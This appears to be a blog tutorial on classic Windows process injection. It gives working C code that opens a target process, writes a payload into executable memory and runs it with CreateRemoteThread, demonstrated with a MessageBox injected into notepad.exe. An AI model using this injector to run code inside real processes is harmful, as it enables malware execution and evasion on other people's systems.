Classic Payload Injection (CreateRemoteThread)

I am continuing the last post regarding the process enumeration that we can use to find the target process that become the host of our payload

After we get the specific process PID then we can try to open the target process using the code below. The PID is the process ID that we got from the enumeration

hProc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
			PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
			FALSE, (DWORD)pid);

When the above execution is successful then go further to inject the payload by creating the threat in the target process

Below is the very basic remote thread injection code. I believe this code will trigger so much alert so becreafull on using it

int Inject(HANDLE hProc, unsigned char* payload, unsigned int payload_len) {

	LPVOID pRemoteCode = NULL;
	HANDLE hThread = NULL;

	pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
	WriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T*)NULL);

	hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL);
	if (hThread != NULL) {
		WaitForSingleObject(hThread, 500);
		CloseHandle(hThread);
		return 0;
	}

	return -1;
}

The above code will create new memory space VirtualAllocEx in the target process with execute capability (PAGE_EXECUTE_READ). When the memory space has been created then the payload is ready to be copied to the new space using WriteProcessMemory. if the memory copy process work smoothly then a thread in the process need to be activated using CreateRemoteThread.

We can see notepad.exe thread with the process hacker before payload is injectedas below

We can compare the threads after we execute the injection

The payload is successfully executed in the newly created thread within notepad.exe process. The payload that we inject is to execute MessageBox like below. We can see the detail in thread 7728 the messagebox API were called

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s